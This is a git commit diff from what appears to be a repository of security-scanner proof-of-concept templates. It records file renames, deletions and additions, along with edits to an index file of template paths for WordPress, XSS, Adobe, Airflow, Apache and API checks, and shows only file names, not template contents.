poc/wordpress/wordpress-git-config-11278.yaml delete mode 100644 poc/wordpress/wordpress-gotmls-detect-11280.yaml rename poc/wordpress/{wordpress-gtranslate-plugin-listing-11284.yaml => wordpress-gtranslate-plugin-listing-11282.yaml} (100%) delete mode 100644 poc/wordpress/wordpress-gtranslate-plugin-listing.yaml delete mode 100644 poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml rename poc/wordpress/{wordpress-installer-log-11290.yaml => wordpress-installer-log-11292.yaml} (100%) delete mode 100644 poc/wordpress/wordpress-lfi.yaml delete mode 100644 poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml rename poc/wordpress/{wordpress-redirection-plugin-listing.yaml => wordpress-redirection-plugin-listing-11308.yaml} (100%) create mode 100644 poc/wordpress/wordpress-takeover-11312.yaml delete mode 100644 poc/wordpress/wordpress-takeover-11313.yaml create mode 100644 poc/wordpress/wordpress-themes-detect-11316.yaml rename poc/wordpress/{wordpress-total-upkeep-backup-download-11322.yaml => wordpress-total-upkeep-backup-download-11324.yaml} (100%) create mode 100644 poc/wordpress/wordpress-weak-credentials-11336.yaml delete mode 100644 poc/wordpress/wordpress-weak-credentials-11337.yaml delete mode 100644 poc/wordpress/wordpress-woocommerce-listing-11339.yaml create mode 100644 poc/wordpress/wordpress-woocommerce-listing-11341.yaml delete mode 100644 poc/wordpress/wordpress-woocommerce-sqli-11345.yaml delete mode 100644 poc/wordpress/wordpress-woosidebars.yaml create mode 100644 poc/wordpress/wordpress-wordfence-lfi-11346.yaml delete mode 100644 poc/wordpress/wordpress-wordfence-lfi-11350.yaml delete mode 100644 poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml delete mode 100644 poc/wordpress/wordpress-workflow-11363.yaml create mode 100644 poc/wordpress/wordpress-workflow-11365.yaml create mode 100644 poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml delete mode 100644 poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml 
delete mode 100644 poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml rename poc/wordpress/{wordpress-xmlrpc-listmethods.yaml => wordpress-xmlrpc-listmethods-11374.yaml} (100%) delete mode 100644 poc/wordpress/wordpress-zebra-form-xss-11378.yaml create mode 100644 poc/wordpress/wordpress-zebra-form-xss-11379.yaml create mode 100644 poc/wordpress/wordpress.yaml create mode 100644 poc/wordpress/wp-ambience-xss-11407.yaml create mode 100644 poc/wordpress/wp-arforms-listing-11415.yaml rename poc/wordpress/{wp-code-snippets-xss-11425.yaml => wp-code-snippets-xss.yaml} (100%) create mode 100644 poc/wordpress/wp-custom-tables-xss-11433.yaml delete mode 100644 poc/wordpress/wp-custom-tables-xss-11434.yaml mode change 100755 => 100644 poc/wordpress/wp-debug-log.yaml delete mode 100644 poc/wordpress/wp-email-subscribers-listing.yaml delete mode 100644 poc/wordpress/wp-finder-xss-11445.yaml create mode 100644 poc/wordpress/wp-force-ssl.yaml create mode 100644 poc/wordpress/wp-full-path-disclosure-11455.yaml delete mode 100644 poc/wordpress/wp-full-path-disclosure-11457.yaml create mode 100644 poc/wordpress/wp-grimag-open-redirect-11458.yaml rename poc/wordpress/{wp-gtranslate-open-redirect.yaml => wp-gtranslate-open-redirect-11463.yaml} (100%) delete mode 100644 poc/wordpress/wp-gtranslate-open-redirect-11465.yaml rename poc/wordpress/{wp-install-11475.yaml => wp-install-11473.yaml} (100%) create mode 100644 poc/wordpress/wp-install.yaml create mode 100644 poc/wordpress/wp-javospot-lfi-11482.yaml delete mode 100644 poc/wordpress/wp-javospot-lfi.yaml delete mode 100644 poc/wordpress/wp-knews-xss-11487.yaml create mode 100644 poc/wordpress/wp-knews-xss-11488.yaml create mode 100644 poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml create mode 100644 poc/wordpress/wp-mstore-plugin-listing-11500.yaml create mode 100644 poc/wordpress/wp-multiple-theme-ssrf-11513.yaml delete mode 100644 poc/wordpress/wp-phpfreechat-xss-11524.yaml create mode 100644 
poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml rename poc/wordpress/{wp-plugin-1-flashgallery-listing-11531.yaml => wp-plugin-1-flashgallery-listing.yaml} (100%) rename poc/wordpress/{wp-plugin-utlimate-member.yaml => wp-plugin-utlimate-member-11542.yaml} (100%) rename poc/wordpress/{wp-popup-listing.yaml => wp-popup-listing-11543.yaml} (100%) delete mode 100644 poc/wordpress/wp-prostore-open-redirect-11546.yaml create mode 100644 poc/wordpress/wp-prostore-open-redirect-11550.yaml delete mode 100644 poc/wordpress/wp-qards-listing-11552.yaml create mode 100644 poc/wordpress/wp-qards-listing.yaml create mode 100644 poc/wordpress/wp-revslider-file-download-11554.yaml create mode 100644 poc/wordpress/wp-securimage-xss-11556.yaml delete mode 100644 poc/wordpress/wp-securimage-xss-11560.yaml rename poc/wordpress/{wp-sfwd-lms-listing-11562.yaml => wp-sfwd-lms-listing-11564.yaml} (100%) delete mode 100644 poc/wordpress/wp-simple-fields-lfi-11569.yaml delete mode 100644 poc/wordpress/wp-slideshow-xss-11572.yaml create mode 100644 poc/wordpress/wp-slideshow-xss-11574.yaml rename poc/wordpress/{wp-tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} (100%) create mode 100755 poc/wordpress/wp-vault-local-file-inclusion.yaml create mode 100644 poc/wordpress/wp-whmcs-xss-11614.yaml create mode 100644 poc/wordpress/wp-woocommerce-file-download-11620.yaml delete mode 100644 poc/wordpress/wp-woocommerce-file-download.yaml create mode 100644 poc/wordpress/wpdm-cache-session-11436.yaml delete mode 100644 poc/wordpress/wpdm-cache-session-11438.yaml delete mode 100644 poc/wordpress/wpengine-config-check.yaml create mode 100644 poc/wordpress/wptouch-open-redirect-11592.yaml create mode 100644 poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml delete mode 100644 poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml delete mode 100644 poc/xss/aem-setpreferences-xss.yaml rename poc/xss/{aem-xss-childlist-selector-197.yaml => 
aem-xss-childlist-selector-198.yaml} (100%) delete mode 100644 poc/xss/aem-xss-childlist-selector.yaml delete mode 100644 poc/xss/basic-xss-prober-698.yaml create mode 100644 poc/xss/coldfusion-debug-xss-1153.yaml delete mode 100644 poc/xss/coldfusion-debug-xss.yaml create mode 100644 poc/xss/concrete-xss-1178.yaml rename poc/xss/{concrete-xss-1177.yaml => concrete-xss.yaml} (100%) delete mode 100644 poc/xss/elex-woocommerce-xss-7199.yaml create mode 100644 poc/xss/elex-woocommerce-xss.yaml rename poc/xss/{empirecms-xss.yaml => empirecms-xss-7218.yaml} (100%) delete mode 100644 poc/xss/empirecms-xss-7220.yaml create mode 100644 poc/xss/feedwordpress-xss-7459.yaml create mode 100644 poc/xss/flow-flow-social-stream-xss-7524.yaml delete mode 100644 poc/xss/flow-flow-social-stream-xss.yaml delete mode 100644 poc/xss/kafdrop-xss-8411.yaml create mode 100644 poc/xss/laravel-ignition-xss.yaml create mode 100644 poc/xss/mida-eframework-xss.yaml delete mode 100644 poc/xss/moodle-filter-jmol-xss-8946.yaml delete mode 100644 poc/xss/moodle-xss-8950.yaml create mode 100644 poc/xss/oracle-ebs-xss-9373.yaml delete mode 100644 poc/xss/oracle-ebs-xss-9376.yaml create mode 100644 poc/xss/parentlink-xss-9467.yaml create mode 100644 poc/xss/parentlink-xss.yaml delete mode 100644 poc/xss/qcubed-xss-9749.yaml create mode 100644 poc/xss/qcubed-xss.yaml delete mode 100644 poc/xss/rockmongo-xss-9902.yaml rename poc/{other/nuclei_template.yaml => xss/rxss.yaml} (100%) create mode 100644 poc/xss/samsung-wlan-ap-xss-10012.yaml delete mode 100644 poc/xss/samsung-wlan-ap-xss.yaml create mode 100644 poc/xss/squirrelmail-add-xss-10515.yaml delete mode 100644 poc/xss/squirrelmail-add-xss.yaml create mode 100644 poc/xss/thruk-xss-10759.yaml create mode 100644 poc/xss/top-xss-params-10807.yaml delete mode 100644 poc/xss/top-xss-params-10809.yaml rename poc/xss/{wems-manager-xss.yaml => wems-manager-xss-11192.yaml} (100%) create mode 100644 poc/xss/window-name-domxss-11213.yaml delete mode 100644 
poc/xss/window-name-domxss.yaml delete mode 100644 poc/xss/wordpress-wordfence-waf-bypass-xss-11356.yaml delete mode 100644 poc/xss/wordpress-zebra-form-xss-11378.yaml create mode 100644 poc/xss/wordpress-zebra-form-xss-11379.yaml create mode 100644 poc/xss/wp-ambience-xss-11407.yaml rename poc/xss/{wp-code-snippets-xss-11425.yaml => wp-code-snippets-xss.yaml} (100%) create mode 100644 poc/xss/wp-custom-tables-xss-11433.yaml delete mode 100644 poc/xss/wp-custom-tables-xss-11434.yaml delete mode 100644 poc/xss/wp-finder-xss-11445.yaml delete mode 100644 poc/xss/wp-knews-xss-11487.yaml create mode 100644 poc/xss/wp-knews-xss-11488.yaml delete mode 100644 poc/xss/wp-phpfreechat-xss-11524.yaml create mode 100644 poc/xss/wp-securimage-xss-11556.yaml delete mode 100644 poc/xss/wp-securimage-xss-11560.yaml delete mode 100644 poc/xss/wp-slideshow-xss-11572.yaml create mode 100644 poc/xss/wp-slideshow-xss-11574.yaml create mode 100644 poc/xss/wp-whmcs-xss-11614.yaml
diff --git a/date.txt b/date.txt
index ee1c5e1ee9..d0a507843a 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240608
+20240609
diff --git a/poc.txt b/poc.txt
index ee26840479..7eddf04341 100644
--- a/poc.txt
+++ b/poc.txt
@@ -18,7 +18,6 @@ ./poc/adobe/adobe-coldfusion-detect-4.yaml ./poc/adobe/adobe-coldfusion-detect-5.yaml ./poc/adobe/adobe-coldfusion-detect-6.yaml -./poc/adobe/adobe-coldfusion-detect-82.yaml ./poc/adobe/adobe-coldfusion-detect-83.yaml ./poc/adobe/adobe-coldfusion-detect-84.yaml ./poc/adobe/adobe-coldfusion-detector-1.yaml
@@ -29,29 +28,29 @@ ./poc/adobe/adobe-coldfusion-detector-6.yaml ./poc/adobe/adobe-coldfusion-detector-error.yaml ./poc/adobe/adobe-coldfusion-error-detect-85.yaml +./poc/adobe/adobe-coldfusion-error-detect-86.yaml ./poc/adobe/adobe-coldfusion-error-detect-87.yaml -./poc/adobe/adobe-coldfusion-error-detect-88.yaml +./poc/adobe/adobe-coldfusion-error-detect.yaml ./poc/adobe/adobe-component-login-1.yaml ./poc/adobe/adobe-component-login-2.yaml -./poc/adobe/adobe-component-login-90.yaml +./poc/adobe/adobe-component-login-89.yaml +./poc/adobe/adobe-component-login-91.yaml ./poc/adobe/adobe-component-login-92.yaml ./poc/adobe/adobe-component-login.yaml -./poc/adobe/adobe-connect-central-login-93.yaml ./poc/adobe/adobe-connect-central-login-94.yaml ./poc/adobe/adobe-connect-central-login-95.yaml +./poc/adobe/adobe-connect-central-login-96.yaml ./poc/adobe/adobe-connect-central-login-97.yaml ./poc/adobe/adobe-connect-central-login.yaml -./poc/adobe/adobe-connect-username-exposure-100.yaml ./poc/adobe/adobe-connect-username-exposure-101.yaml ./poc/adobe/adobe-connect-username-exposure-98.yaml ./poc/adobe/adobe-connect-username-exposure-99.yaml ./poc/adobe/adobe-connect-username-exposure.yaml -./poc/adobe/adobe-connect-version-102.yaml ./poc/adobe/adobe-connect-version-103.yaml -./poc/adobe/adobe-connect-version-104.yaml +./poc/adobe/adobe-connect-version.yaml ./poc/adobe/adobe-connect.yaml ./poc/adobe/adobe-cq5.yaml -./poc/adobe/adobe-experience-manager-login-105.yaml +./poc/adobe/adobe-experience-manager-login-106.yaml ./poc/adobe/adobe-experience-manager-login-107.yaml ./poc/adobe/adobe-experience-manager-login-108.yaml ./poc/adobe/adobe-experience-manager-login-109.yaml 
@@ -63,15 +62,15 @@ ./poc/adobe/adobe-media-server-110.yaml ./poc/adobe/adobe-media-server-111.yaml ./poc/adobe/adobe-media-server-113.yaml +./poc/adobe/adobe-media-server-114.yaml ./poc/adobe/adobe-media-server-115.yaml -./poc/adobe/adobe-media-server.yaml ./poc/adobe/adobe-phish.yaml ./poc/adobe/adobe-robohelp.yaml ./poc/adobe/adobe-secret.yaml ./poc/adobe/aem-acs-common.yaml ./poc/adobe/aem-bg-servlet-127.yaml ./poc/adobe/aem-bg-servlet-128.yaml -./poc/adobe/aem-bg-servlet-129.yaml +./poc/adobe/aem-bg-servlet.yaml ./poc/adobe/aem-cached-pages-131.yaml ./poc/adobe/aem-cached-pages.yaml ./poc/adobe/aem-cms-finder.yaml @@ -88,8 +87,8 @@ ./poc/adobe/aem-default-get-servlet-11.yaml ./poc/adobe/aem-default-get-servlet-12.yaml ./poc/adobe/aem-default-get-servlet-13.yaml +./poc/adobe/aem-default-get-servlet-135.yaml ./poc/adobe/aem-default-get-servlet-136.yaml -./poc/adobe/aem-default-get-servlet-137.yaml ./poc/adobe/aem-default-get-servlet-139.yaml ./poc/adobe/aem-default-get-servlet-14.yaml ./poc/adobe/aem-default-get-servlet-15.yaml @@ -143,7 +142,6 @@ ./poc/adobe/aem-default-get-servlet-8.yaml ./poc/adobe/aem-default-get-servlet-9.yaml ./poc/adobe/aem-default-get-servlet.yaml -./poc/adobe/aem-default-login-140.yaml ./poc/adobe/aem-default-login-141.yaml ./poc/adobe/aem-default-login-142.yaml ./poc/adobe/aem-detection-143.yaml @@ -156,12 +154,11 @@ ./poc/adobe/aem-fuzz.yaml ./poc/adobe/aem-gql-servlet-147.yaml ./poc/adobe/aem-gql-servlet-148.yaml -./poc/adobe/aem-gql-servlet-149.yaml +./poc/adobe/aem-gql-servlet-150.yaml ./poc/adobe/aem-gql-servlet.yaml ./poc/adobe/aem-groovyconsole-151.yaml ./poc/adobe/aem-groovyconsole-152.yaml ./poc/adobe/aem-groovyconsole-153.yaml -./poc/adobe/aem-groovyconsole-154.yaml ./poc/adobe/aem-groovyconsole-155.yaml ./poc/adobe/aem-groovyconsole-156.yaml ./poc/adobe/aem-hash-querybuilder-157.yaml 
@@ -169,18 +166,17 @@ ./poc/adobe/aem-hash-querybuilder-160.yaml ./poc/adobe/aem-hash-querybuilder-161.yaml ./poc/adobe/aem-hash-querybuilder.yaml -./poc/adobe/aem-jcr-querybuilder-162.yaml ./poc/adobe/aem-jcr-querybuilder-163.yaml ./poc/adobe/aem-jcr-querybuilder-164.yaml +./poc/adobe/aem-jcr-querybuilder-165.yaml ./poc/adobe/aem-jcr-querybuilder-166.yaml ./poc/adobe/aem-list-custom.yaml +./poc/adobe/aem-login-status-167.yaml ./poc/adobe/aem-login-status-168.yaml -./poc/adobe/aem-login-status-169.yaml ./poc/adobe/aem-login-status-170.yaml ./poc/adobe/aem-login-status-171.yaml ./poc/adobe/aem-merge-metadata-servlet-172.yaml ./poc/adobe/aem-merge-metadata-servlet-173.yaml -./poc/adobe/aem-merge-metadata-servlet-174.yaml ./poc/adobe/aem-misc-admin.yaml ./poc/adobe/aem-offloading-browser.yaml ./poc/adobe/aem-osgi-bundles.yaml @@ -188,7 +184,7 @@ ./poc/adobe/aem-querybuilder-feed-servlet-177.yaml ./poc/adobe/aem-querybuilder-internal-path-read-1.yaml ./poc/adobe/aem-querybuilder-internal-path-read-178.yaml -./poc/adobe/aem-querybuilder-internal-path-read-180.yaml +./poc/adobe/aem-querybuilder-internal-path-read-179.yaml ./poc/adobe/aem-querybuilder-internal-path-read-181.yaml ./poc/adobe/aem-querybuilder-internal-path-read-2.yaml ./poc/adobe/aem-querybuilder-internal-path-read-3.yaml 
@@ -199,20 +195,19 @@ ./poc/adobe/aem-querybuilder-json-servlet-184.yaml ./poc/adobe/aem-querybuilder-json-servlet-185.yaml ./poc/adobe/aem-querybuilder-json-servlet-187.yaml +./poc/adobe/aem-secrets.yaml ./poc/adobe/aem-security-users.yaml ./poc/adobe/aem-setpreferences-xss-189.yaml -./poc/adobe/aem-setpreferences-xss.yaml ./poc/adobe/aem-sling-login.yaml ./poc/adobe/aem-userinfo-servlet-190.yaml ./poc/adobe/aem-userinfo-servlet-191.yaml -./poc/adobe/aem-userinfo-servlet-192.yaml +./poc/adobe/aem-userinfo-servlet-193.yaml ./poc/adobe/aem-userinfo-servlet.yaml ./poc/adobe/aem-wcm-suggestions-servlet-194.yaml ./poc/adobe/aem-wcm-suggestions-servlet-195.yaml ./poc/adobe/aem-wcm-suggestions-servlet.yaml ./poc/adobe/aem-workflow.yaml -./poc/adobe/aem-xss-childlist-selector-197.yaml -./poc/adobe/aem-xss-childlist-selector.yaml +./poc/adobe/aem-xss-childlist-selector-198.yaml ./poc/adobe/aem.yaml ./poc/adobe/aem_misconfig.yaml ./poc/adobe/cached-aem-pages.yaml 
@@ -222,34 +217,34 @@ ./poc/adobe/libwww-perl-daemon.yaml ./poc/adobe/mdaemon-email-server.yaml ./poc/adobe/mjniohttpdaemon.yaml -./poc/adobe/possible-AEM-secrets.yaml ./poc/adobe/servudaemon-ini.yaml ./poc/adobe/vmware-authentication-daemon-detect.yaml ./poc/airflow/Airflow-Unauth.yaml ./poc/airflow/Airflow-unauthorized.yaml ./poc/airflow/airflow-api-exposure.yaml ./poc/airflow/airflow-configuration-exposure-229.yaml -./poc/airflow/airflow-configuration-exposure.yaml +./poc/airflow/airflow-configuration-exposure-230.yaml +./poc/airflow/airflow-debug-231.yaml ./poc/airflow/airflow-debug-232.yaml -./poc/airflow/airflow-debug-233.yaml ./poc/airflow/airflow-debug.yaml ./poc/airflow/airflow-default-credentials.yaml ./poc/airflow/airflow-default-login-235.yaml ./poc/airflow/airflow-default-login-236.yaml ./poc/airflow/airflow-detect-237.yaml ./poc/airflow/airflow-detect-238.yaml -./poc/airflow/airflow-detect-239.yaml +./poc/airflow/airflow-detect-240.yaml ./poc/airflow/airflow-exposure.yaml -./poc/airflow/airflow-panel-241.yaml +./poc/airflow/airflow-panel-242.yaml ./poc/airflow/airflow-panel-243.yaml +./poc/airflow/airflow-panel-244.yaml ./poc/airflow/airflow-panel-245.yaml ./poc/airflow/airflow-panel.yaml ./poc/airflow/airflow-unauth.yaml ./poc/airflow/airflow-unauth.yml ./poc/airflow/airflow-workflow.yaml ./poc/airflow/apache-airflow.yaml +./poc/airflow/unauthenticated-airflow-10884.yaml ./poc/airflow/unauthenticated-airflow-10885.yaml -./poc/airflow/unauthenticated-airflow-10886.yaml ./poc/airflow/unauthenticated-airflow-10887.yaml ./poc/airflow/unauthenticated-airflow.yaml ./poc/apache/APACHE-Ambari-weakPass.yaml 
@@ -272,20 +267,22 @@ ./poc/apache/apache-airflow.yaml ./poc/apache/apache-ambari-default-password.yml ./poc/apache/apache-ambari.yaml +./poc/apache/apache-answer-detect.yaml ./poc/apache/apache-apisix-dashboard.yaml ./poc/apache/apache-apisix-panel-336.yaml -./poc/apache/apache-apisix-panel-337.yaml +./poc/apache/apache-apisix-panel-338.yaml ./poc/apache/apache-apisix-panel.yaml ./poc/apache/apache-apisix.yaml ./poc/apache/apache-archiva.yaml ./poc/apache/apache-axis-detect-1.yaml ./poc/apache/apache-axis-detect-2.yaml ./poc/apache/apache-axis-detect-3.yaml +./poc/apache/apache-axis-detect-339.yaml ./poc/apache/apache-axis-detect-340.yaml -./poc/apache/apache-axis-detect.yaml +./poc/apache/apache-axis-detect-341.yaml ./poc/apache/apache-axis.yaml ./poc/apache/apache-axis2.yaml -./poc/apache/apache-cocoon-detect-342.yaml +./poc/apache/apache-cocoon-detect.yaml ./poc/apache/apache-cocoon.yaml ./poc/apache/apache-config-343.yaml ./poc/apache/apache-config-344.yaml @@ -294,10 +291,10 @@ ./poc/apache/apache-couchdb-unauth.yaml ./poc/apache/apache-couchdb.yaml ./poc/apache/apache-detect-345.yaml +./poc/apache/apache-detect-346.yaml ./poc/apache/apache-detect-347.yaml ./poc/apache/apache-detect-348.yaml ./poc/apache/apache-detect-349.yaml -./poc/apache/apache-detect.yaml ./poc/apache/apache-dir-listing.yaml ./poc/apache/apache-directory-exposure.yaml ./poc/apache/apache-drill-exposure.yaml @@ -314,7 +311,6 @@ ./poc/apache/apache-filename-brute-force-353.yaml ./poc/apache/apache-filename-brute-force.yaml ./poc/apache/apache-filename-enum.yaml -./poc/apache/apache-flink-unauth-rce-355.yaml ./poc/apache/apache-flink-unauth-rce-356.yaml ./poc/apache/apache-flink-unauth-rce-357.yaml ./poc/apache/apache-flink-unauth-rce-358.yaml 
@@ -335,7 +331,6 @@ ./poc/apache/apache-httpd-cve-2021-40438-ssrf.yml ./poc/apache/apache-httpd-cve-2021-41773-path-traversal.yml ./poc/apache/apache-httpd-cve-2021-41773-rce.yml -./poc/apache/apache-httpd-rce-362.yaml ./poc/apache/apache-httpd-rce-363.yaml ./poc/apache/apache-httpd-rce.yaml ./poc/apache/apache-impala.yaml @@ -366,10 +361,11 @@ ./poc/apache/apache-skywalking.yaml ./poc/apache/apache-solr-91-rce.yaml ./poc/apache/apache-solr-file-read-367.yaml -./poc/apache/apache-solr-file-read-369.yaml +./poc/apache/apache-solr-file-read-368.yaml ./poc/apache/apache-solr-file-read-370.yaml ./poc/apache/apache-solr-log4j-CVE-2021-44228.yaml ./poc/apache/apache-solr-log4j-cve-2021-44228.yaml +./poc/apache/apache-solr-log4j-rce-372.yaml ./poc/apache/apache-solr-log4j-rce.yaml ./poc/apache/apache-solr-rce.yaml ./poc/apache/apache-solr-remotestreaming-anyfileread.yaml @@ -404,7 +400,6 @@ ./poc/apache/default-apache-test-all-6812.yaml ./poc/apache/default-apache-test-all-6813.yaml ./poc/apache/default-apache-test-all-6814.yaml -./poc/apache/default-apache-test-all.yaml ./poc/apache/default-apache-test-page-6816.yaml ./poc/apache/default-apache-test-page-6817.yaml ./poc/apache/default-apache-test-page-6818.yaml @@ -417,7 +412,6 @@ ./poc/apache/default-apache2-ubuntu-page-6809.yaml ./poc/apache/default-apache2-ubuntu-page-6810.yaml ./poc/apache/default-apache2-ubuntu-page-6811.yaml -./poc/apache/default-apache2-ubuntu-page.yaml ./poc/api/ApacheNifi-Api-UnauthorizedAccess.yaml ./poc/api/Discuz-info-api.yaml ./poc/api/Google-api.yaml 
@@ -445,83 +439,81 @@ ./poc/api/alfacgiapi-wordpress-257.yaml ./poc/api/alfacgiapi-wordpress-3.yaml ./poc/api/alfacgiapi-wordpress-4.yaml -./poc/api/alfacgiapi-wordpress.yaml ./poc/api/apache-apisix-dashboard.yaml ./poc/api/apache-apisix-panel-336.yaml -./poc/api/apache-apisix-panel-337.yaml +./poc/api/apache-apisix-panel-338.yaml ./poc/api/apache-apisix-panel.yaml ./poc/api/apache-apisix.yaml ./poc/api/apache-nifi-api-unauthorized-access.yml +./poc/api/api-abstractapi-383.yaml ./poc/api/api-abstractapi.yaml -./poc/api/api-abuseipdb-384.yaml -./poc/api/api-accuweather-386.yaml -./poc/api/api-adafruit-io-387.yaml +./poc/api/api-abuseipdb-385.yaml +./poc/api/api-abuseipdb.yaml +./poc/api/api-accuweather.yaml +./poc/api/api-adafruit-io.yaml ./poc/api/api-aletheia.yaml -./poc/api/api-alienvault-388.yaml ./poc/api/api-alienvault-389.yaml ./poc/api/api-alienvault-390.yaml -./poc/api/api-apigee-edge-391.yaml -./poc/api/api-appveyor-392.yaml +./poc/api/api-apigee-edge.yaml +./poc/api/api-appveyor.yaml ./poc/api/api-asana-393.yaml ./poc/api/api-aviationstack.yaml ./poc/api/api-bearer-auth-a2f3021256bf5d76bbaeaff6f05d43fd.yaml ./poc/api/api-bearer-auth.yaml -./poc/api/api-bible.yaml +./poc/api/api-bible-394.yaml ./poc/api/api-bing-map-2018-bdd86a2dc395718687e612b89b6cd720.yaml ./poc/api/api-bing-map-2018.yaml ./poc/api/api-bingmaps-395.yaml -./poc/api/api-bingmaps.yaml ./poc/api/api-bitly-396.yaml -./poc/api/api-bitrise.yaml -./poc/api/api-block-400.yaml +./poc/api/api-bitrise-397.yaml +./poc/api/api-block.yaml ./poc/api/api-blockchain-399.yaml -./poc/api/api-blockchain.yaml ./poc/api/api-bravenewcoin.yaml ./poc/api/api-breezometer.yaml ./poc/api/api-buildkite-402.yaml -./poc/api/api-buildkite.yaml ./poc/api/api-buttercms-403.yaml ./poc/api/api-calendly-404.yaml ./poc/api/api-carboninterface.yaml ./poc/api/api-circleci-405.yaml ./poc/api/api-circleci-406.yaml -./poc/api/api-circleci.yaml ./poc/api/api-clearbit.yaml ./poc/api/api-climatiq.yaml ./poc/api/api-cloudmersive.yaml 
-./poc/api/api-coinapi-408.yaml +./poc/api/api-coinapi.yaml ./poc/api/api-cooperhewitt-410.yaml ./poc/api/api-cooperhewitt-411.yaml ./poc/api/api-covalent.yaml ./poc/api/api-dbt.yaml -./poc/api/api-debounce-414.yaml -./poc/api/api-deviantart.yaml +./poc/api/api-debounce.yaml +./poc/api/api-deviantart-415.yaml ./poc/api/api-dribbble-416.yaml -./poc/api/api-dribbble.yaml +./poc/api/api-dribbble-417.yaml ./poc/api/api-dropbox-418.yaml ./poc/api/api-endpoints.yaml ./poc/api/api-europeana-419.yaml +./poc/api/api-europeana-420.yaml ./poc/api/api-europeana-421.yaml ./poc/api/api-facebook-422.yaml -./poc/api/api-fastly.yml -./poc/api/api-festivo.yaml +./poc/api/api-fastly-424.yaml +./poc/api/api-fastly.yaml +./poc/api/api-festivo-425.yaml ./poc/api/api-fixer.yaml ./poc/api/api-fontawesome-426.yaml ./poc/api/api-fortitoken-cloud.yaml ./poc/api/api-front.yaml -./poc/api/api-fullhunt-428.yaml +./poc/api/api-fullhunt.yaml ./poc/api/api-github.yaml ./poc/api/api-gitlab-430.yaml ./poc/api/api-gitlab.yml -./poc/api/api-google-drive.yaml +./poc/api/api-google-drive-432.yaml ./poc/api/api-harvardart-434.yaml ./poc/api/api-harvardart.yaml ./poc/api/api-heroku.yaml -./poc/api/api-hirak-rates-436.yaml +./poc/api/api-hirak-rates.yaml ./poc/api/api-hubspot-437.yaml -./poc/api/api-hubspot.yaml ./poc/api/api-iconfinder-438.yaml -./poc/api/api-improvmx-440.yaml +./poc/api/api-iconfinder-439.yaml +./poc/api/api-improvmx.yaml ./poc/api/api-info-themes-plugins-wp-org-66caa0b56de1f5b395ccb9edd74d127d.yaml ./poc/api/api-info-themes-plugins-wp-org-a5ba91db466ae424f41944b08096d121.yaml ./poc/api/api-info-themes-plugins-wp-org-b2b4c6858b9f9bf1ce417b44adf44c1b.yaml 
@@ -530,13 +522,13 @@ ./poc/api/api-info-themes-plugins-wp-org-plugin.yaml ./poc/api/api-info-themes-plugins-wp-org.yaml ./poc/api/api-instagram.yaml -./poc/api/api-instatus-442.yaml -./poc/api/api-intercom.yaml +./poc/api/api-instatus.yaml +./poc/api/api-intercom-443.yaml ./poc/api/api-ipapi.yaml -./poc/api/api-ipstack.yaml +./poc/api/api-ipstack-444.yaml ./poc/api/api-iqair.yaml -./poc/api/api-iterable.yaml -./poc/api/api-jumpcloud.yaml +./poc/api/api-iterable-445.yaml +./poc/api/api-jumpcloud-446.yaml ./poc/api/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml ./poc/api/api-key-for-google-maps.yaml ./poc/api/api-keys.yaml 
@@ -545,83 +537,75 @@ ./poc/api/api-leanix.yaml ./poc/api/api-linkedin.yaml ./poc/api/api-linkfinder.yaml -./poc/api/api-lokalise-452.yaml +./poc/api/api-lokalise.yaml ./poc/api/api-loqate-453.yaml -./poc/api/api-mailchimp-454.yaml ./poc/api/api-mailchimp.yaml ./poc/api/api-mailgun-455.yaml ./poc/api/api-malshare-456.yaml -./poc/api/api-malwarebazaar-458.yaml +./poc/api/api-malshare.yaml ./poc/api/api-malwarebazaar-459.yaml ./poc/api/api-mapbox-465.yaml -./poc/api/api-mapbox.yaml ./poc/api/api-marketstack.yaml ./poc/api/api-mediastack.yaml -./poc/api/api-mojoauth-466.yaml +./poc/api/api-mojoauth.yaml ./poc/api/api-mywot-467.yaml -./poc/api/api-mywot-468.yaml ./poc/api/api-nerdgraph-469.yaml ./poc/api/api-nerdgraph.yaml -./poc/api/api-netlify-470.yaml +./poc/api/api-netlify.yaml ./poc/api/api-npm-471.yaml ./poc/api/api-npm.yaml ./poc/api/api-onelogin.yaml ./poc/api/api-openweather-473.yaml -./poc/api/api-openweather.yaml ./poc/api/api-optimizely-474.yaml -./poc/api/api-pagerduty.yaml +./poc/api/api-pagerduty-475.yaml ./poc/api/api-particle.yaml ./poc/api/api-pastebin-477.yaml ./poc/api/api-paypal-478.yaml ./poc/api/api-pendo-479.yaml -./poc/api/api-petfinder.yaml +./poc/api/api-pendo.yaml +./poc/api/api-petfinder-480.yaml ./poc/api/api-pinata-481.yaml -./poc/api/api-pivotaltracker.yaml +./poc/api/api-pivotaltracker-482.yaml ./poc/api/api-positionstack.yaml -./poc/api/api-postmark-483.yaml ./poc/api/api-postmark.yaml ./poc/api/api-quip-484.yaml ./poc/api/api-rate-limit-exceeded.yaml ./poc/api/api-reviewapi.yaml ./poc/api/api-rijksmuseum-485.yaml -./poc/api/api-rijksmuseum.yaml ./poc/api/api-scanii-487.yaml +./poc/api/api-scanii-488.yaml ./poc/api/api-screenshotlayer.yaml ./poc/api/api-seatgeek.yaml -./poc/api/api-sendgrid-489.yaml ./poc/api/api-sendgrid.yaml -./poc/api/api-slack-493.yaml +./poc/api/api-slack.yaml ./poc/api/api-sonarcloud-494.yaml +./poc/api/api-sonarcloud.yaml ./poc/api/api-sportdataapi.yaml -./poc/api/api-spotify-495.yaml 
